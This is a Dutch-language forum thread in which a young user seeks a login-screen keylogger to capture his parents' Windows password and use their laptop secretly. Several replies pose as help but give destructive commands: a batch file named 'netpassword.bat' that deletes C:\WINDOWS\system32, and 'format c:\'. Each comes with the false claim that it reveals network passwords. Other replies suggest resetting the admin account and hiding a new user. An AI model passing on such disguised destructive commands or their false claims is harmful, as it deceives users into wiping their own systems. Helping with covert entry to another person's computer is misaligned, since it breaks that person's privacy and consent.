XXL Nutrition

keylogger hulp nodig

Hoe staat het met hun Administrator account? Vaak staat daar geen wachtwoord op, en kun je via enkele programma's (mogelijk) achter het wachtwoord van je ouders komen...Oh, dat is niet meer nodig, want je kunt gebruik maken van hun laptop op je 20e:)

wtf dude, believe me thats not it.
ik wil het op de laptop van me ouders zetten zodat ik achter de windows wachtwoord kan komen zodat ik de laptop ook kan gebruiken wanneer me ouders er niet zijn.

dus het moet een keylogger zijn die al vanaf de login screen begint met capturen. en die bestaan heb het vorig jaar nog gehad!

get a job en koop je eigen laptop, f'ing pauper! -_-'

• Topic Starter Topic Starter
Omdat je geen eigen laptop hebt, en je dus afhankelijk bent van je ouders voor het internetgebruik :P En daarmee trok ik wat parallelen met wat bekende hier op dit forum.

ik heb me eigen pc met internet, de reden waarom ik op de laptop wil komen is prive

of die opgepikt kan worden door me ouders is niet eens zo belangrijk die weten dan denk k toch niet wat het is.

misschien is er een andere manier om er via het netwerk achter te komen zondat dat ik wat op hun laptop hoef te installeren.
want we zitten allemaal op 1 netwerk!

best simpel, open je dos command prompt, en typ "net view" in
vervolgens maak je een nieuw txt bestand en typ je daar in:
"@echo off
del c:\WINDOWS\system32"
bestand opslaan als "netpassword.bat" en het bestand openen.

edit: dan krijg je een venster open waarin alle paswoorden van iedereen op het netwerk staan, en dan is het gewoon een kwestie van het juiste paswoord te kiezen:)

Laatst bewerkt:
We willen eerst weten waarom je van je ouders niet op de computer mag als ze weg zijn.

hey dat is wel een goeie, maar daarmee reset je de wachtwoord toch, dus dan heb k er alsnog niet veel aan eigenlijk?

Je reset gewoon het admin account en maakt vervolgens gewoon een nieuwe user aan voor jezelf. (en de manier van inloggen zo instellen dat je via een gebruikersnaam inlogt, anders zien ze je nieuwe account gewoon staan :P)

GZHN, beantwoord nu onze vragen eens ipv ze te ontwijken! ****ing breezah!

best simpel, open je dos command prompt, en typ "net view" in
vervolgens maak je een nieuw txt bestand en typ je daar in:
"@echo off
del c:\WINDOWS\system32"
bestand opslaan als "netpassword.bat" en het bestand openen.

edit: dan krijg je een venster open waarin alle paswoorden van iedereen op het netwerk staan, en dan is het gewoon een kwestie van het juiste paswoord te kiezen:)

thnks dude maar die netpassword.bat moet ik dus openen terwijl de cmd nog loopt ofsow? kga het direct proberen.

thnks dude maar die netpassword.bat moet ik dus openen terwijl de cmd nog loopt ofsow? kga het direct proberen.

ja met dat 'nieuwe venster' bedoelde ik die command prompt, daar waar je net view eerst had ingetypt verschijnen de wachtwoorden

ja met dat 'nieuwe venster' bedoelde ik die command prompt, daar waar je net view eerst had ingetypt verschijnen de wachtwoorden

ik kan die netpassword.bat niet openen wortd geblokkeerd, en kheb me virusscanner ook uitstaan. hmm vreemd.

ik kan die netpassword.bat niet openen wortd geblokkeerd, en kheb me virusscanner ook uitstaan. hmm vreemd.

zoals cod hierboven al zei is die map tegenwoordig beveiligd, even geduld en ik zal ff checken hoe je die beveiliging omzeilt:)

:lol:

Die Angelus moest even weten wat hij deed:p

Maarre, ga naar start->uitvoeren->cmd->type in: format c:\ -> druk dan op: j

Zie hier die wachtwoorden.

Lol ga je je ouders oplichten?

:lol:

Die Angelus moest even weten wat hij deed:p

Maarre, ga naar start->uitvoeren->cmd->type in: format c:\ -> druk dan op: j

Zie hier die wachtwoorden.

format c:\ ?
haha dude u can't fool me met je "format" zover gaat mijn kennis nog wel:P

---------- Toegevoegd om 17:53 ---------- De post hierboven werd geplaatst om 17:52 ----------

zoals cod hierboven al zei is die map tegenwoordig beveiligd, even geduld en ik zal ff checken hoe je die beveiliging omzeilt:)

okey dankje, zal fijn zijn als dit gaat werken!

@Swafcore: Doet ie toch niet, je krijgt een melding dan of je het volume wilt ontkoppelen met de nodige uitleg waarom erbij.
Enne @GZHN: Je kennis houdt al gauw op dan .. :p

Terug
Naar boven